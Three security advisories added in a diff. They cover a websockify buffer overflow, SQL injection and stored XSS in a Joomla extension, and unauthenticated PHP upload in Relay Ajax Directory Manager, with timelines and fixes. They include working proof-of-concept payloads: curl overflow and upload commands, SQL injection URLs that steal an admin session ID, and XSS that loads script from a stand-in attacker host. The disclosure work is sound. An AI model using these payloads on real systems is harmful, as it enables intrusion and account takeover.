+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+
+Introduction
+============
+
+"websockify was formerly named wsproxy and was part of the noVNC
+project.
+
+At the most basic level, websockify just translates WebSockets traffic
+to normal TCP socket traffic. Websockify accepts the WebSockets
+handshake, parses it, and then begins forwarding traffic between the
+client and the target in both directions."
+
+(from the project's readme)
+
+
+More Details
+============
+
+For each new connection, websockify forks and calls the function
+do_handshake() to receive a client's WebSocket handshake. The
+following excerpt shows some of the source code responsible for
+receiving the client's data from the socket file descriptor:
+
+------------------------------------------------------------------------
+
+ws_ctx_t *do_handshake(int sock) {
+    char handshake[4096], response[4096], sha1[29], trailer[17];
+    [...]
+    offset = 0;
+    for (i = 0; i < 10; i++) {
+        len = ws_recv(ws_ctx, handshake+offset, 4096);
+        if (len == 0) {
+            handler_emsg("Client closed during handshake\n");
+            return NULL;
+        }
+        offset += len;
+        handshake[offset] = 0;
+        if (strstr(handshake, "\r\n\r\n")) {
+            break;
+        }
+        usleep(10);
+    }
+    [...]
+
+------------------------------------------------------------------------
+
+As can be seen in the listing, the function ws_recv() is called in a
+loop to read data from the client's socket into the stack-allocated
+buffer 'handshake'. Each time ws_recv() is called, a maximum of 4096
+bytes are read from the socket and stored in the handshake buffer.
+The variable 'offset' determines the position in the buffer at which
+the received data is written. In each iteration, the value of 'offset'
+is increased by the amount of bytes received. If the received data
+contains the string "\r\n\r\n", which marks the end of the WebSocket
+handshake data, the loop is terminated. Otherwise, the loop is
+terminated after a maximum of 10 iterations. The do_handshake()
+function returns early if no more data can be received from the
+socket.
+
+By forcing websockify to iterate multiple times, attackers can
+exploit this behaviour to write data past the space allocated for the
+handshake buffer, thereby corrupting adjacent memory.
+
+
+Proof of Concept
+================
+
+The following curl command can be used to trigger the buffer overflow:
+
+$ curl http://example.com/$(python -c 'print "A"*5000')
+
+Providing a generic exploit for this vulnerability is not feasible, as
+it depends on the server side environment websockify is used in as well
+as the used compiler and its flags. However, during a penetration test
+it was possible to successfully exploit this buffer overflow
+vulnerability and to execute arbitrary commands on the server.
+
+Workaround
+==========
+
+Use the Python implementation of websockify.
+
+
+Fix
+===
+
+The vulnerability has been fixed in commit 192ec6f [0].
+
+
+Security Risk
+=============
+
+Successful exploitation of the vulnerability allows attackers to execute
+arbitrary code on the affected system. It is therefore rated as a high
+risk.
+
+
+Timeline
+========
+
+2016-04-14 Vulnerability identified
+2016-05-03 Advisory provided to customer
+2016-05-06 Customer provided updated firmware, notified users
+2016-05-23 Customer notified users again
+2016-05-31 Advisory published
+
+
+References
+==========
+
+[0] https://github.com/kanaka/websockify/commit/192ec6f5f9bf9c80a089ca020d05ad4bd9e7bcd9
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/

platforms/php/webapps/39879.txt

@@ -0,0 +1,58 @@
+Information
+------------------------------
+Advisory by ADEO Security Team
+Name: Stored XSS and SQL Injection in Joomla SecurityCheck extension
+Affected Software : SecurityCheck and SecurityCheck Pro
+Vulnerable Versions: 2.8.9 (possibly below)
+Vendor Homepage : https://securitycheck.protegetuordenador.com
+Vulnerabilities Type : XSS and SQL Injection
+Severity : High
+Status : Fixed
+
+Technical Details
+------------------------------
+PoC URLs for SQL Injection
+
+For determining database, user and version.
+
+http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
+http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
+http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1
+
+For steal admin's session ID (If admin is not online, page response with
+attack detected string. If online, response with admin's session ID)
+
+http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
+concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
+%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
+23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
+
+PoC URLs for XSS
+
+Add a new admin to website silently while admin checking SecurityCheck logs
+
+http://website/index.php?option=<script>var script =
+document.createElement('script');script.src = "http://ATTACKER/attack.js
+";document.getElementsByTagName('head')[0].appendChild(script);</script>
+
+attack.js
+https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca
+
+
+Disclosure Timeline
+------------------------------
+24/05/2016 SQL injection found
+30/05/2016 Worked on one-shot exploit for SQLi
+30/05/2016 While we were working on SQLi payload we also found XSS
+31/05/2016 XSS payload prepared
+31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
+31/05/2016 Vulnerabilities fixed in v2.8.10
+
+Solution
+------------------------------
+Update to the latest version of SecurityCheck (2.8.10)
+
+Credits
+------------------------------
+These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
+Muhammet Dilmac (muhammetdilmac.com.tr).

platforms/php/webapps/39881.txt

@@ -0,0 +1,224 @@
+Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager
+          may Lead to Remote Command Execution
+
+A vulnerability within the Relay Ajax Directory Manager web application
+allows unauthenticated attackers to upload arbitrary files to the web
+server running the web application.
+
+
+Details
+=======
+
+Product: Relay Ajax Directory Manager
+Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other
+                   versions most likely vulnerable as well.
+Fixed Versions: -
+Vulnerability Type: Unauthenticated File Upload
+Security Risk: high
+Vendor URL: https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
+Vendor Status: decided not to fix, project is unmaintained
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-005
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+
+Introduction
+============
+
+Relay Ajax Directory Manager[1], also known as relay[2], is a web-based
+file manager. It allows files and folders to be uploaded via drag and
+drop and provides several other features, such as a thumbnail preview
+for images and basic user authentication functionality.
+
+
+More Details
+============
+
+While the web application itself is mostly written in PHP, it also
+utilizes the Perl script 'upload.pl' for handling uploads initiated by
+the user.
+
+Uploading is a multi-step process:
+
+1. The user initiates a multipart/form-data upload request through the
+   web application. This request is sent to the Perl script and the
+   following steps are handled by it.
+2. A temporary file containing the entire request (including
+   headers) is created. This temporary file is named partly by the first
+   URL parameter, as shown in the following listing.
+3. The headers and the POST body of the request are parsed and filtered
+   to determine the final filename.
+4. The upload is written to the final destination.
+5. A file containing statistics about the upload process is written
+
+During steps 2-5, no checks are performed to ensure that the user is
+sufficiently authenticated.
+
+The following listing shows parts of the upload Perl script:
+
+-- upload.pl -----------------------------------------------------------
+
+[...]
+
+@qstring=split(/&/,$ENV{'QUERY_STRING'});
+$sessionid = $qstring[0];
+
+[...]
+
+$tmpfile   = "$uploadsFolder\\temp_$sessionid";
+$statsfile = "$uploadsFolder\\stats_$sessionid.txt";
+$tmpfilepre= "$uploadsFolder\\$sessionid\_";
+
+[...]
+
+open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";
+binmode(FILE);
+print FILE $filedata;
+close FILE;
+
+[...]
+
+------------------------------------------------------------------------
+
+Here, the first URL parameter is stored in the variable $sessionid. The
+content of this variable is then used as a prefix for the filename for
+the uploaded data before it ultimately gets written. Given the
+configured upload directory, which is 'uploads/' by default, the URL of
+the uploaded file can be determined.
+
+The web application usually requires users to be authenticated before
+any actions (e.g. uploading) can be performed, but since the Perl script
+is not secured by any form of authentication, it can be accessed by
+anyone. If the web server does not prohibit the execution of e.g. PHP
+files within the upload directory, arbitrary PHP commands can be
+executed by uploading the respective files to the web server.
+
+
+Proof of Concept
+================
+
+In general, the Perl script expects a request containing
+multipart/form-data. In this case, the name specified in the 'filename'
+field is prepended with the first URL parameter. Using the command line
+HTTP client curl, a request like the following can be made to a
+vulnerable installation of Relay Ajax Directory Manager in order to
+upload a PHP script which invokes the function 'phpinfo()':
+
+curl -i -s -k  -X 'POST' \
+-H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' \
+--data-binary $'------------------------------83ff53821b7c\x0d\x0a'\
+$'Content-Disposition: form-data; filename=\"info.php\"\x0d\x0a'\
+$'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'\
+$'<?php phpinfo(); ?>\x0d\x0a'\
+$'------------------------------83ff53821b7c--' \
+'http://example.com/relay-1-5-3/upload.pl?redteam'
+
+The server responds with HTTP status code 200 indicating a successful
+upload:
+
+HTTP/1.1 200 OK
+Date: Mon, 09 May 2016 11:09:50 GMT
+Server: Apache/2.4.18 (Debian)
+Content-Length: 0
+Content-Type: text/plain
+
+Such a request would yield the following files in the web server's
+upload directory upon success:
+
+$ ls relay-1-5-3/uploads/
+redteam_info.php  stats_redteam.txt  temp_redteam
+
+The file redteam_info.php contains the multipart/form-data that was
+sent to the upload.pl script:
+
+$ cat relay-1-5-3/uploads/temp_redteam.php
+<?php phpinfo(); ?>
+
+Requesting this file with the URL
+http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield
+the server's output of the phpinfo() function.
+
+However, since the entire content of the upload request is saved to a
+temporary file, a regular POST request containing only the code to be
+executed is sufficient to exploit this vulnerability. The following
+invocation of curl uploads the same PHP script which invokes the
+function 'phpinfo()':
+
+$ curl --silent --include --data '<?php phpinfo(); ?>' \
+'http://example.com/relay-1-5-3/upload.pl?redteam.php'
+
+In the server's upload directory, the file temp_redteam.php contains
+the data that was sent to the upload.pl script:
+
+$ ls  relay-1-5-3/uploads/
+stats_redteam.php.txt  temp_redteam.php
+
+$ cat temp_redteam.php
+<?php phpinfo(); ?>
+
+Requesting this file with the URL
+http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield
+the server's output of the phpinfo() function.
+
+Using either of these methods, an attacker is able to upload arbitrary
+files to the affected web server e.g. in order to easily execute PHP
+commands with the privileges of the web server.
+
+
+Workaround
+==========
+
+One possible workaround would be to prevent the execution of files in
+the upload directory and deliver them as attachments instead.
+
+
+Fix
+===
+
+None.
+
+
+Security Risk
+=============
+
+This vulnerability allows unauthenticated attackers to upload arbitrary
+files to the affected system. In the web server's and project's default
+configuration it is very likely that this may be used to execute
+arbitrary commands with the privileges of the web server process. This
+is possible without authentication, thereby providing no barrier for
+attackers. It is therefore rated as a high risk. Since this software is
+quite old and not well maintained, it is likely that additional
+vulnerabilities exist. However, this was not further evaluated.
+
+
+Timeline
+========
+
+2015-11-19 Vulnerability discovered
+2016-04-07 Customer approved disclosure of vulnerability
+2016-05-12 Developers contacted, project is no longer maintained
+2016-05-31 Advisory published
+
+
+References
+==========
+
+[1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager
+[2] https://code.google.com/p/relay/
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/